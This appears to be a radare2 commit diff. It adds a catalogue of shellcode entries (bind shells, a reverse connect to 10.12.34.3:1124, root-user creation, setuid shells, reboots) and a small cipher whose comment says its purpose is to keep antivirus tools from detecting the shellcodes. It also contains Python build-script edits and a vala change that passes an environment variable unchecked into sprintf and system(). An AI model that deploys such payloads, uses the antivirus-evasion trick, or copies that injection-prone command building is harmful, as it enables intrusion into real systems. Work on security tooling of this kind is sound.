ENTRY(0,0,0,"dual.linux.binsh", x86_ppc_linux_binsh, "x86/ppc MacOSX /bin/sh shellcode" )
ENTRY(0,0,0,"dual.osx.binsh", x86_ppc_osx_binsh, "Runs /bin/sh (works also on x86) (dual)" )
ENTRY(0,0,0,"mips.linux.binsh", mips_linux_binsh, "Runs /bin/sh (tested on loongson2f)." )
ENTRY(0,0,0,"ppc.osx.adduser", ppc_osx_adduser, "Adds a root user named 'r00t' with no pass." )
ENTRY(0,0,0,"ppc.osx.binsh", ppc_osx_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"ppc.osx.binsh0", ppc_osx_binsh0, "Executes /bin/sh (with zeroes)" )
ENTRY(0,0,0,"ppc.osx.bind4444", ppc_osx_bind4444, "Binds a shell at port 4444" )
ENTRY(0,0,0,"ppc.osx.reboot", ppc_osx_reboot, "Reboots the box" )
ENTRY(0,0,0,"ppc.bsd.binsh", ppc_bsd_binsh, "Runs /bin/sh" )
ENTRY(0,0,0,"sparc.linux.binsh", sparc_linux_binsh, "Runs /bin/sh on sparc/linux" )
ENTRY(0,0,0,"sparc.linux.bind4444", sparc_linux_bind4444, "Binds a shell at TCP port 4444" )
ENTRY(0,0,0,"sparc.linux.binsh2", sparc_linux_javicoder_binsh, "Runs /bin/sh on sparc/linux (coder)" )
ENTRY(0,0,0,"sparc.linux.bind1124", sparc_linux_javicoder_portbind, "Listen shell at 1124" )
ENTRY(0,0,0,"sparc.linux.connect", sparc_linux_javicoder_connect, "Connects to 10.12.34.3 : 1124")
//ENTRY(0,0,0,"ia64.linux.binsh", ia64_linux_binsh, "Executes /bin/sh on Intel Itanium" )
ENTRY(0,0,0,"x64.linux.binsh", x64_linux_binsh, "Runs /bin/sh on 64 bits" )
ENTRY(0,0,0,"x64.osx.suidsh", x64_osx_suidsh, "Setuid(0) and runs /bin/sh")
ENTRY(0,43,39,"x64.osx.reverse", x64_osx_reverse_tcp, "OSX reverse connect shell")
ENTRY(0,0,0,"x86.bsd.binsh", x86_bsd_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.bsd.binsh2", x86_bsd_binsh2, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.bsd.suidsh", x86_bsd_suidsh, "Setuid(0) and runs /bin/sh" )
ENTRY(0,0,0,"x86.bsd.bind4444", x86_bsd_bind4444, "Binds a shell at port 4444" )
ENTRY(0,0,0,"x86.bsdlinux.binsh", x86_bsdlinux_binsh, "Dual linux/bsd shellcode runs /bin/sh" )
ENTRY(0,0,0,"x86.freebsd.reboot", x86_freebsd_reboot, "Reboots target box" )
ENTRY(0,0,0,"x86.freebsd.reverse", x86_freebsd_reverse, "Reboots target box" )
ENTRY(0,0,0,"x86.linux.adduser", x86_linux_adduser, "Adds user 'x' with password 'y'" )
ENTRY(0,0,0,"x86.linux.bind4444", x86_linux_bind4444, "Binds a shell at TCP port 4444" )
ENTRY(0,0,0,"x86.linux.binsh", x86_linux_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.linux.binsh1", x86_linux_binsh1, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.linux.binsh2", x86_linux_binsh2, "Executes /bin/sh" )
ENTRY(43,0,0,"x86.linux.binsh3", x86_linux_binsh3, "Executes /bin/sh or CMD" )
ENTRY(0,0,0,"x86.linux.udp4444", x86_linux_udp4444, "Binds a shell at UDP port 4444" )
ENTRY(0,0,0,"x86.netbsd.binsh", x86_netbsd_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.openbsd.binsh", x86_openbsd_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.openbsd.bind6969", x86_openbsd_bind6969, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.osx.binsh", x86_osx_binsh, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.osx.binsh2", x86_osx_binsh2, "Executes /bin/sh" )
ENTRY(0,0,0,"x86.osx.bind4444", x86_osx_bind4444, "Binds a shell at port 4444" )
ENTRY(0,0,0,"x86.solaris.binsh", x86_solaris_binsh, "Runs /bin/sh" )
ENTRY(0,0,0,"x86.solaris.binshu", x86_solaris_binshu, "Runs /bin/sh (toupper() safe)" )
ENTRY(0,0,0,"x86.solaris.bind4444", x86_solaris_bind4444, "Binds a shell at port 4444" )
ENTRY(0,0,0,"x86.w32.msg", x86_w32_msg, "Shows a MessageBox" )
ENTRY(0,0,0,"x86.w32.cmd", x86_w32_cmd_exit, "Runs cmd.exe and ExitThread" )
ENTRY(0,0,0,"x86.w32.adduser", x86_w32_adduser, "Adds user 'x' with password 'y'" )
ENTRY(0,0,0,"x86.w32.bind4444", x86_w32_bind4444, "Binds a shell at port 4444" )
ENTRY(0,0,0,"x86.w32.tcp4444", x86_w32_tcp4444, "Binds a shell at port 4444" )
ENTRY_NULL()
};
#if 0
main()
{
void (*punk)() = &x86_linux_binsh;
punk();
printf("%s\n", shellcodes[0].desc);
}
#endif

64
binr/rasc2/xorhex.c Normal file
View File

@ -0,0 +1,64 @@
/* stupid source file cipher -- pancake */
/* this is necessary in order to avoid antiviruses detect shellcodes are malware */
#include <stdio.h>
#include <string.h>
static int unshift = 0;
static char shiftchar (char c) {
if (c>='0'&&c<='9') c=c-'0';
else if (c>='a'&&c<='f') c=c-'a'+10;
else if (c>='A'&&c<='F') c=c-'A'+10;
else return c;
if (unshift) c = (c==0xf)?0:c+1;
else c = c?c-1:0xf;
//if (unshift) c = ((c<<1)&0xf) | ((c&0x80)>>7);
//else c = (c>>1) | ((c&1)<<7);
return (c<=9)? c+'0': (c-10)+'a';
}
static int ishexa(char c) {
if (c>='0'&&c<='9') return 1;
if (c>='a'&&c<='f') return 1;
if (c>='A'&&c<='F') return 1;
return 0;
}
static void parsestr (char *b) {
char o = 0;
for (b++; *b; b++) {
if (o=='\\' && *b=='x')
for (b++; *b && ishexa (*b); b++)
*b = shiftchar (*b);
o = *b;
}
}
static void parseint (char *b) {
char o = 0;
for (b++; *b; b++) {
if (o=='0' && *b=='x')
for (b++; *b && ishexa (*b); b++)
*b = shiftchar (*b);
o = *b;
}
}
int main(int argc, char **argv) {
char buf[2048];
unshift = argc-1;
for (;;) {
fgets (buf, sizeof (buf), stdin);
if (feof (stdin))
return 0;
if (buf[0]=='\t') {
if (!memcmp (buf+1, "\"\\x", 3))
parsestr (buf);
else
if (!memcmp (buf+1, "0x", 2))
parseint (buf);
}
printf ("%s", buf);
}
}

View File

@ -28,8 +28,9 @@ lang_python.${EXT_SO}:
-L${HOME}/.wine/drive_c/Python27/libs -L../../core/ -lr_core \
${LDFLAGS_LIB} -shared -o lang_python.${EXT_SO} python.c -lpython27
else
PYCFLAGS=$(shell ./pycfg --cflags)
PYLDFLAGS=$(shell ./pycfg --libs)
PYCFG=../../../swig/python-config-wrapper
PYCFLAGS=$(shell ${PYCFG} --cflags)
PYLDFLAGS=$(shell ${PYCFG} --libs)
lang_python.${EXT_SO}:
${CC} ${CFLAGS} ${PYCFLAGS} ${PYLDFLAGS} \

View File

@ -1,7 +0,0 @@
#!/bin/sh
PYTHONS="python python2 python2.5 python2.6 python2.7 python2.8 python3"
for a in ${PYTHONS} ; do
$a-config $@ | sed -e 's/-arch [^\s]*//g' | sed s,-Wstrict-prototypes,,g
[ $? = 0 ] && exit 0
done
exit 1

View File

@ -9,7 +9,7 @@
static int r_vala_file(RLang *lang, const char *file) {
void *lib;
char *p, name[512], buf[512];
char *p, *vapidir, name[512], buf[512];
if (!strstr (file, ".vala"))
sprintf (name, "%s.vala", file);
@ -19,7 +19,11 @@ static int r_vala_file(RLang *lang, const char *file) {
return R_FALSE;
}
sprintf (buf, "valac --pkg r_core -C %s", name);
vapidir = r_sys_getenv ("VAPIDIR");
if (vapidir && *vapidir)
sprintf (buf, "valac --vapidir=%s --pkg r_core -C %s",
vapidir, name);
else sprintf (buf, "valac --pkg r_core -C %s", name);
if (system (buf) != 0)
return R_FALSE;
p = strstr (name, ".vala"); if (p) *p=0;

View File

@ -3,7 +3,8 @@
# -- pancake
# order matters here
PCS=" python2-config
PCS=" python-config
python2-config
python25-config
python2.5-config
python26-config
@ -29,4 +30,4 @@ if [ "$1" = "-n" ]; then
exit 0
fi
${PYTHONCONFIG} $@ | sed -e s,-Wstrict-prototypes,,g 2>/dev/null
${PYTHONCONFIG} $@ | sed -e 's/-arch [^\s]*//g' | sed s,-Wstrict-prototypes,,g 2>/dev/null